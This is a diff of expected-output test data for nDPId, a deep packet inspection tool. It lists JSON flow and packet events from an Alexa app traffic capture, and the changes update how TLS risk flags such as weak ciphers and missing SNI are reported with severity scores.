+01013{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":993,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976071286,"flow_last_seen":1490976071444,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1490976071444,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45693,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":998,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":1490976071448,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976071448,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw0V1AAOcGzpw0XuiGrBAq2AG76TIsDp+yTuXca3ASH\/6OPgAAAgQFtAEDAwY="}
 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":999,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":73,"flow_packet_id":3,"flow_last_seen":1490976071449,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976071449,"pkt":"AMDKkaPvePiC0\/vCCABFAAAohlpAAEAGwKisECrYNF7ohukyAbtO5dxrLA6fs1AQAVfYrwAA"}
-00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1000,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071392,"flow_last_seen":1490976071451,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1490976071451,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":59698,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS","24":"SNI TLS extension was missing"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00907{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1006,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976071380,"flow_last_seen":1490976071486,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1490976071486,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45696,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8":"Weak TLS cipher"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
-00907{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1013,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976071349,"flow_last_seen":1490976071501,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1490976071501,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45695,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8":"Weak TLS cipher"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
-01554{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1020,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976071392,"flow_last_seen":1490976071512,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3459,"flow_avg_l4_payload_len":494,"midstream":0,"ts_msec":1490976071512,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":59698,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8":"Weak TLS cipher","15":"TLS (probably) not carrying HTTPS","24":"SNI TLS extension was missing"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}}
+01068{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1000,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071392,"flow_last_seen":1490976071451,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1490976071451,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":59698,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01014{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1006,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976071380,"flow_last_seen":1490976071486,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1490976071486,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45696,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
+01014{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1013,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976071349,"flow_last_seen":1490976071501,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1490976071501,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45695,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
+01821{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1020,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976071392,"flow_last_seen":1490976071512,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3459,"flow_avg_l4_payload_len":494,"midstream":0,"ts_msec":1490976071512,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":59698,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1039,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071583,"flow_last_seen":1490976071583,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976071583,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45698,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1039,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1490976071583,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976071583,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8H+ZAAEAGJwmsECrYNF7ohrKCAbsHHkWgAAAAAKAC\/\/\/3+QAAAgQFtAQCCAoA9lpGAAAAAAEDAwg="}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1057,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":74,"flow_packet_id":2,"flow_last_seen":1490976071640,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976071640,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwgCVAAOcGH9U0XuiGrBAq2AG7soJWhIA2Bx5FoXASH\/6YhgAAAgQFtAEDAwY="}
 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1058,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":74,"flow_packet_id":3,"flow_last_seen":1490976071641,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976071641,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoH+dAAEAGJxysECrYNF7ohrKCAbsHHkWhVoSAN1AQAVfi9wAA"}
-00825{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1059,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071583,"flow_last_seen":1490976071642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976071642,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45698,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-00907{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1063,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976071583,"flow_last_seen":1490976071700,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1490976071700,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45698,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8":"Weak TLS cipher"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
-00907{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1076,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976071385,"flow_last_seen":1490976071803,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":563,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1490976071803,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45697,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8":"Weak TLS cipher"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
+00851{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1059,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071583,"flow_last_seen":1490976071642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976071642,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45698,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+01014{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1063,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976071583,"flow_last_seen":1490976071700,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1490976071700,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45698,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
+01014{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1076,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976071385,"flow_last_seen":1490976071803,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":563,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1490976071803,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45697,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1113,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976076042,"flow_last_seen":1490976076042,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976076042,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":37113,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1113,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1490976076042,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976076042,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8BbZAAEAGQTmsECrYNF7ohpD5Abuu0lmyAAAAAKAC\/\/9b\/gAAAgQFtAQCCAoA9lwEAAAAAAEDAwg="}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1114,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":75,"flow_packet_id":2,"flow_last_seen":1490976076114,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976076114,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwMG5AAOcGb4w0XuiGrBAq2AG7kPnjZM+NrtJZs3ASH\/4iEQAAAgQFtAEDAwY="}
 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1115,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":75,"flow_packet_id":3,"flow_last_seen":1490976076117,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976076117,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoBbdAAEAGQUysECrYNF7ohpD5Abuu0lmz42TPjlAQAVdsggAA"}
-00846{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1116,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976076042,"flow_last_seen":1490976076117,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1490976076117,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":37113,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00913{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1118,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976076042,"flow_last_seen":1490976076167,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1490976076167,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":37113,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}}
+00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1116,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976076042,"flow_last_seen":1490976076117,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1490976076117,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":37113,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01099{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1118,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976076042,"flow_last_seen":1490976076167,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1490976076167,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":37113,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1128,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976076275,"flow_last_seen":1490976076275,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976076275,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49613,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1128,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1490976076275,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976076275,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8Bx5AAEAGP9GsECrYNF7ohsHNAFDXKVsFAAAAAKAC\/\/8C1AAAAgQFtAQCCAoA9lwbAAAAAAEDAwg="}
 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1130,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":76,"flow_packet_id":2,"flow_last_seen":1490976076338,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976076338,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwijBAAOcGFco0XuiGrBAq2ABQwc3F00\/v1ylbBnASH\/5mLQAAAgQFtAEDAwY="}
 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1131,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":76,"flow_packet_id":3,"flow_last_seen":1490976076340,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976076340,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoBx9AAEAGP+SsECrYNF7ohsHNAFDXKVsGxdNP8FAQAVewngAA"}
